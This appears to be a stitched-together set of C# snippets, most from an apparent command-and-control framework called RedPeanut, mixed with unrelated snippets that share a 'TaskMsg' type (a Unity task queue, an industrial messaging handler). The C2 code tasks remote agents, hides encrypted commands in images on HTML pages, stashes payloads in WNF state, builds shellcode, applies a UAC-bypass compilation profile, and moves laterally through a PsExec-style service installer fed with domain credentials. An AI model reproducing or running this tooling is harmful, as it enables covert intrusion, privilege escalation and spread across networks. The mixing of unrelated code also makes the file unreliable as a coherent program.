public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent) { if (agent != null) { ModuleConfig modconfig = new ModuleConfig { Assembly = ReadResourceFile(resname), Method = "Execute", Moduleclass = type, Parameters = args.ToArray <string>() }; TaskMsg task = new TaskMsg { TaskType = "module", Instanceid = RandomAString(10, new Random()), ModuleTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); } }
public static void RunStandardBase64(string assembly, string method, string type, string[] args, IAgentInstance agent) { if (agent != null) { StandardConfig modconfig = new StandardConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>() }; TaskMsg task = new TaskMsg { TaskType = "standard", Instanceid = RandomAString(10, new Random()), StandardTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); } }
public void RemoveCommand(IAgentInstance agent, TaskMsg task) { TaskMsg msg = commandqueue.GetValueOrDefault(agent.AgentId).ElementAt(commandqueue.GetValueOrDefault(agent.AgentId).IndexOf(task)); AddTaskResponse(msg.Instanceid, msg); commandqueue.GetValueOrDefault(agent.AgentId).Remove(task); }
public static TaskMsg GetTaskSMB(NamedPipeClientStream pipe) { byte[] messageBytes = ReadMessage(pipe); byte[] line = Convert.FromBase64String(Encoding.Default.GetString(messageBytes)); //Console.WriteLine("[*] Received: {0}", Encoding.Default.GetString(line)); TaskMsg task = new TaskMsg(); try { task = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line)); if (task.Chunked) { for (int i = 1; i < task.ChunkNumber; i++) { messageBytes = ReadMessage(pipe); line = Convert.FromBase64String(Encoding.Default.GetString(messageBytes)); TaskMsg tmpmsg = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line)); task.ModuleTask.Assembly += tmpmsg.ModuleTask.Assembly; } } } catch (Exception e) { Console.WriteLine("[*] Error: {0}", e.Message); Console.WriteLine("[*] Error: {0}", e.StackTrace); } return(task); }
public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered) { wc.UseDefaultCredentials = true; wc.Proxy = WebRequest.DefaultWebProxy; wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; string resp = wc.DownloadString(rpaddress); if (!string.IsNullOrEmpty(resp)) { if (isCovered) { string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/')); resp = Encoding.Default.GetString(ImageLoader.ImageLoader.Load(baseurl, rpaddress, resp, wc, targetclass)); } var line = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv); TaskMsg task = null; try { task = new JavaScriptSerializer().Deserialize <TaskMsg>(line); //task = JsonConvert.DeserializeObject<TaskMsg>(line); } catch (Exception) { } return(task); } else { return(null); } }
int ProcessTaskNodeData(TaskNode node) { if (node.processDataCallBack != null) { node.processDataCallBack(node.data); } if (node.releaseDataCallBack != null) { node.releaseDataCallBack(node.data); } TaskMsg taskMsg = node.msg; switch (taskMsg) { case TaskMsg.TMSG_QUIT: quitSem.Set(); return(1); case TaskMsg.TMSG_PAUSE: pauseSem.WaitOne(); pauseSem.Reset(); break; } return(0); }
private void BtnServerSend_Click(object sender, RoutedEventArgs e) { TaskMsg heartMsg = new TaskMsg() { DEVICE_TYPE = "A", //MESSAGE_TYPE = "heart",// NO = "A1", DATA = new TaskData() { MATERIEL_CODE = "EEEEEEE", ORDER_NO = "123123", WORKORDER_CODE = "A2S2D3F4F4" }, time_stamp = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss") }; string strMsg = JsonConvert.SerializeObject(heartMsg); server.SendMessage(strMsg, txtRouteKey.Text); ExecuteMsg execMsg = new ExecuteMsg() { DATA = new List <RltData>() { new RltData() { Bar_code = "d123" } }, DEVICE_TYPE = "E015", NO = "E01501", }; strMsg = JsonConvert.SerializeObject(execMsg); server.SendMessage(strMsg, txtRouteKey.Text); }
public static void LoadRP() { try { TaskMsg task = GetTaskWnf(); StringBuilder myb = new StringBuilder(); StringWriter sw = new StringWriter(myb); TextWriter oldOut = Console.Out; Console.SetOut(sw); Console.SetError(sw); string classname = task.ModuleTask.Moduleclass; string assembly = task.ModuleTask.Assembly; string method = task.ModuleTask.Method; string[] paramsv = task.ModuleTask.Parameters; RunAssembly(assembly, classname, method, new object[] { paramsv }); string output = myb.ToString(); Console.SetOut(oldOut); Console.SetError(oldOut); sw.Flush(); sw.Close(); Console.WriteLine(Convert.ToBase64String(Encoding.Default.GetBytes(output))); Environment.Exit(0); } catch (Exception e) { Console.WriteLine("[x] error " + e.Message); Console.WriteLine("[x] error " + e.StackTrace); } }
public TaskNode( TaskCallBack processDataCallBack, TaskCallBack releaseDataCallBack, object taskData, TaskMsg msg = TaskMsg.TMSG_DATA) { this.processDataCallBack = processDataCallBack; this.releaseDataCallBack = releaseDataCallBack; this.data = taskData; this.msg = msg; }
private void Run() { if (!string.IsNullOrEmpty(pipename)) { TaskMsg msg = new TaskMsg(); msg.Agentid = agent.AgentId; msg.TaskType = "pivot"; agent.SendCommand(msg); } }
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null) { if (tasktype != null) { FileDownloadConfig modconfig = new FileDownloadConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>(), FileNameDest = destfilename }; TaskMsg task = new TaskMsg { TaskType = "download", Instanceid = RandomAString(10, new Random()), DownloadTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); } else { ModuleConfig modconfig = new ModuleConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>() }; TaskMsg task = new TaskMsg { TaskType = "module", Instanceid = RandomAString(10, new Random()), ModuleTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); } }
public static TaskMsg GetTaskWnf() { var casper = new byte[0]; TaskMsg task = new TaskMsg(); if (QueryWnf(Natives.WNF_XBOX_STORAGE_CHANGED).Data.Length > 0) { var p1_compressed = QueryWnf(Natives.PART_1).Data; var p2_compressed = QueryWnf(Natives.PART_2).Data; var p3_compressed = QueryWnf(Natives.PART_3).Data; var p4_compressed = QueryWnf(Natives.PART_4).Data; var part1 = DecompressDLL(p1_compressed); var part2 = DecompressDLL(p2_compressed); var part3 = DecompressDLL(p3_compressed); var part4 = DecompressDLL(p4_compressed); var s = new MemoryStream(); s.Write(part1, 0, part1.Length); s.Write(part2, 0, part2.Length); s.Write(part3, 0, part3.Length); s.Write(part4, 0, part4.Length); casper = s.ToArray(); byte[] line = DecompressDLL(Convert.FromBase64String(Encoding.Default.GetString(casper))); try { task = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line)); } catch (Exception e) { Console.WriteLine("[*] Error: {0}", e.Message); Console.WriteLine("[*] Error: {0}", e.StackTrace); } try { RemoveData(); } catch (Exception e) { Console.WriteLine("[*] Error: {0}", e.Message); Console.WriteLine("[*] Error: {0}", e.StackTrace); } } return(task); }
private string CreateTaskMgs(IAgentInstance agent, TaskMsg task) { AesManaged aes = agent.AesManager; HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid); string mesg; if (profile.HtmlCovered) { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER); string htmlsource = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE)); int elements = htmlsource.Split("targetclass").Length - 1; if (elements <= 0) { return(""); } string[] images = ListImages(); Random random = new Random(); int payloadindex = random.Next(1, elements); //Create Image with task embedded string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented); taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes)); string outputfilename = RandomAString(10, random) + ".png"; string outfullpath = Path.Combine(outputfolderrpath, outputfilename); string imagepath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]); ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath); //Add Image to resources C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename)); //Create html page htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images); return(htmlsource); } else { string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented); mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes)); return(mesg); } }
private void RunSetUnManaged() { TaskMsg msg = new TaskMsg { Instanceid = RandomAString(10, new Random()), Agentid = agent.AgentId, TaskType = "managed" }; InjectionManaged injectionManagedTask = new InjectionManaged(); injectionManagedTask.Managed = false; msg.InjectionManagedTask = injectionManagedTask; agent.SendCommand(msg); }
private void RunSetUnBlockDlls() { TaskMsg msg = new TaskMsg { Instanceid = RandomAString(10, new Random()), Agentid = agent.AgentId, TaskType = "blockdlls" }; BlockDlls blockDllsTask = new BlockDlls(); blockDllsTask.Block = false; msg.BlockDllsTask = blockDllsTask; agent.SendCommand(msg); }
public static TaskMsg GetTaskSMB(byte[] aeskey, byte[] aesiv, NamedPipeClientStream pipe) { var messageBytes = ReadMessage(pipe); var line = Crypto.Aes.DecryptAesMessage(messageBytes, aeskey, aesiv); //Console.WriteLine("[*] Received: {0}", line); TaskMsg task = new TaskMsg(); try { task = new JavaScriptSerializer().Deserialize <TaskMsg>(line); } catch (Exception) { } return(task); }
public static void LoadRP() { string pipename = GetPipeName(); try { using (var pipe = new NamedPipeClientStream(".", pipename, PipeDirection.InOut)) { pipe.Connect(5000); pipe.ReadMode = PipeTransmissionMode.Message; TaskMsg task = GetTaskSMB(pipe); StringBuilder myb = new StringBuilder(); StringWriter sw = new StringWriter(myb); TextWriter oldOut = Console.Out; Console.SetOut(sw); Console.SetError(sw); string classname = task.ModuleTask.Moduleclass; string assembly = task.ModuleTask.Assembly; string method = task.ModuleTask.Method; string[] paramsv = task.ModuleTask.Parameters; RunAssembly(assembly, classname, method, new object[] { paramsv }); string output = myb.ToString(); Console.SetOut(oldOut); Console.SetError(oldOut); sw.Flush(); sw.Close(); Console.WriteLine(Convert.ToBase64String(Encoding.Default.GetBytes(output))); Environment.Exit(0); //SendOutputSMB(output, pipe); } } catch (Exception e) { Console.WriteLine("[x] error " + e.Message); Console.WriteLine("[x] error " + e.StackTrace); } }
private void RunRemote(string input) { string command = input; CommandConfig cmdconfig = new CommandConfig { Command = command }; TaskMsg task = new TaskMsg { TaskType = "command", CommandTask = cmdconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); }
public void AddCommand(IAgentInstance agent, TaskMsg task) { if (agent.Pivoter != null) { //Agent pivoted so command will be routed via pivoter if (!commandqueue.ContainsKey(agent.Pivoter.AgentId)) { commandqueue.Add(agent.Pivoter.AgentId, new List <TaskMsg>()); } commandqueue.GetValueOrDefault(agent.Pivoter.AgentId).Add(task); } else { if (!commandqueue.ContainsKey(agent.AgentId)) { commandqueue.Add(agent.AgentId, new List <TaskMsg>()); } commandqueue.GetValueOrDefault(agent.AgentId).Add(task); } }
public ActionResult <string> Get() { //Call by agent to check if there is a task to execute //need to check auth try { string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid")); // Try to find Agent IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid); if (agent != null) { agent.lastseen = DateTime.Now; TaskMsg msg = RedPeanutC2.server.GetCommand(agent); if (msg != null) { string response = CreateTaskMgs(agent, msg); RedPeanutC2.server.RemoveCommand(agent, msg); Console.WriteLine("\n[*] Agent {0} tasked to run command...", agent.AgentId); Program.GetMenuStack().Peek().RePrintCLI(); return(Ok(response)); } else { return(Ok()); } } else { return(NotFound()); } } catch (HttpOperationException) { return(NotFound()); } catch (Exception) { return(NotFound()); } }
private ActionResult PostResponse(StreamReader reader, IAgentInstance agent) { ResponseMsg responsemsg = null; try { Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd()); responsemsg = GetResponseMsg(args.GetValueOrDefault(Paramname), agent); TaskMsg msg = RedPeanutC2.server.GetTaskResponse(responsemsg.TaskInstanceid); Console.WriteLine("\n[*] Received response from agent {0}....", agent.AgentId); if (msg.TaskType.Equals("download")) { byte[] bytefile = Utility.DecompressDLL(Convert.FromBase64String(responsemsg.Data)); string destfolder = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, DOWNLOADS_FOLDER, "downloaded_item_" + msg.DownloadTask.FileNameDest); System.IO.File.WriteAllBytes(destfolder, bytefile); Console.WriteLine("[*] File {0} downloaded", destfolder); Program.GetMenuStack().Peek().RePrintCLI(); return(Ok(CreateOkMgs(agent))); } else { Console.WriteLine(responsemsg.Data); Program.GetMenuStack().Peek().RePrintCLI(); return(Ok(CreateOkMgs(agent))); } } catch (Exception e) { // Something goes wrong decrypting or deserializing message return not found Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return {0}", e.Message); Console.WriteLine("[x] {0}", e.StackTrace); Program.GetMenuStack().Peek().RePrintCLI(); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } }
public ActionResult <string> Get() { //Call by agent to check if there is a task to execute //need to check auth try { string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid")); // Try to find Agent IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid); if (agent != null) { TaskMsg msg = RedPeanutC2.server.GetCommand(agent); if (msg != null) { string response = CreateTaskMgs(agent, msg); RedPeanutC2.server.RemoveCommand(agent, msg); return(Ok(response)); } else { Console.WriteLine("No command"); return(Ok()); } } else { return(NotFound()); } } catch (HttpOperationException) { return(NotFound()); } catch (Exception) { return(NotFound()); } }
public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent) { if (agent != null) { ModuleConfig modconfig = new ModuleConfig { Assembly = ReadResourceFile(resname), Method = "Execute", Moduleclass = type, Parameters = args }; if (agent.Managed) { modconfig.Assembly = ReadResourceFile(resname); } else { modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode( ReadResourceFile(resname), RandomAString(10, new Random()) + ".exe", type, "Execute", args))); } TaskMsg task = new TaskMsg { TaskType = "module", Instanceid = RandomAString(10, new Random()), ModuleTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); } }
private void Run() { try { string host = ((AgentInstanceHttp)agent).GetAddress(); int port = ((AgentInstanceHttp)agent).GetPort(); int profileid = ((AgentInstanceHttp)agent).GetProfileid(); int targetframework = ((AgentInstanceHttp)agent).TargetFramework; string pipename = ""; if (agent.Pivoter != null) { host = agent.Pivoter.SysInfo.Ip; port = 0; profileid = RedPeanutC2.server.GetDefaultProfile(); targetframework = agent.TargetFramework; pipename = agent.AgentId; } else { host = ((AgentInstanceHttp)agent).GetAddress(); port = ((AgentInstanceHttp)agent).GetPort(); profileid = ((AgentInstanceHttp)agent).GetProfileid(); targetframework = agent.TargetFramework; } string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid)) { string source; if (string.IsNullOrEmpty(pipename)) { //Http no pivot stager ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid); source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf); } else { //NamedPipe enable stager ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid)); source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf); } string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework))); ModuleConfig modconfig = new ModuleConfig { Assembly = stagerstr, Method = "Execute", Moduleclass = "RedPeanutRP", Parameters = new string[] { "pippo" } }; TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE)) .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF)) .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task))))) .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn) .Replace("#SHELLCODE#", null) .Replace("#USERNAME#", username) .Replace("#PASSWORD#", password) .Replace("#DOMAIN#", domain) .Replace("#PROCESS#", null); string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass))); RunAssemblyBase64( spawnprocess, "RedPeanutSpawn", new string[] { " " }, agent); } } catch (Exception) { Console.WriteLine("[*] Errore generating task"); } }
private void Run() { List <string> args = new List <string>(); if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null)) { return; } else { //Create stager stream gzip string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); if (lpipename == null) { //Http no pivot stager ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); } else { //NamedPipe enable stager ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); } string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40))); //Create TaskMsg gzip if (agent != null) { ModuleConfig modconfig = new ModuleConfig { Assembly = stagerstr, Method = "Execute", Moduleclass = "RedPeanutRP", Parameters = new string[] { "pippo" } }; TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId }; if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } //Create Service stream gzip source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE)) .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR)) .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task))))) .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn); string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe"))); //Create SharpPsExec stream gzip source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE)) .Replace("#DOMAIN#", domain) .Replace("#USERNAME#", username) .Replace("#PASSWORD#", password) .Replace("#HOSTANME#", targethost) .Replace("#ASSEMBLY#", servicestr) .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe") .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random())) .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random())) .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random())); string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40))); RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent); } } } }
public TaskMsg msg; //任务标志 public TaskNode(TaskMsg taskMsg) { msg = taskMsg; }
//Send command to agent //AES public void SendCommand(TaskMsg task) { server.AddCommand(this, task); }
public override int PostTask(TaskCallBack processDataCallBack, TaskCallBack releaseDataCallBack, object taskData, TaskMsg msg = TaskMsg.TMSG_DATA, int delay = 0) { if (unityUpdate.taskPump == null) { return(-1); } TaskNode taskNode = new TaskNode(processDataCallBack, releaseDataCallBack, taskData, msg); return(unityUpdate.taskPump.PostTask(taskNode, delay)); }
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null) { switch (tasktype) { case "download": FileDownloadConfig downloadconfig = new FileDownloadConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>(), FileNameDest = destfilename }; TaskMsg downloadtask = new TaskMsg { TaskType = "download", DownloadTask = downloadconfig, Agentid = agent.AgentId }; if (instanceid == null) { downloadtask.Instanceid = RandomAString(10, new Random()); } else { downloadtask.Instanceid = instanceid; } if (agent.Pivoter != null) { downloadtask.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(downloadtask); break; case "migrate": ModuleConfig migrateconfig = new ModuleConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>() }; TaskMsg migratetask = new TaskMsg { TaskType = "migrate", ModuleTask = migrateconfig, Agentid = agent.AgentId }; if (instanceid == null) { migratetask.Instanceid = RandomAString(10, new Random()); } else { migratetask.Instanceid = instanceid; } if (agent.Pivoter != null) { migratetask.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(migratetask); break; default: ModuleConfig modconfig = new ModuleConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray <string>() }; if (agent.Managed) { modconfig.Assembly = assembly; } else { modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode( assembly, RandomAString(10, new Random()) + ".exe", type, method, args))); } TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId }; if (instanceid == null) { task.Instanceid = RandomAString(10, new Random()); } else { task.Instanceid = instanceid; } if (agent.Pivoter != null) { task.AgentPivot = agent.Pivoter.AgentId; } agent.SendCommand(task); break; } }
public abstract int PostTask(TaskCallBack processDataCallBack, TaskCallBack releaseDataCallBack, object taskData, TaskMsg msg = TaskMsg.TMSG_DATA, int delay = 0);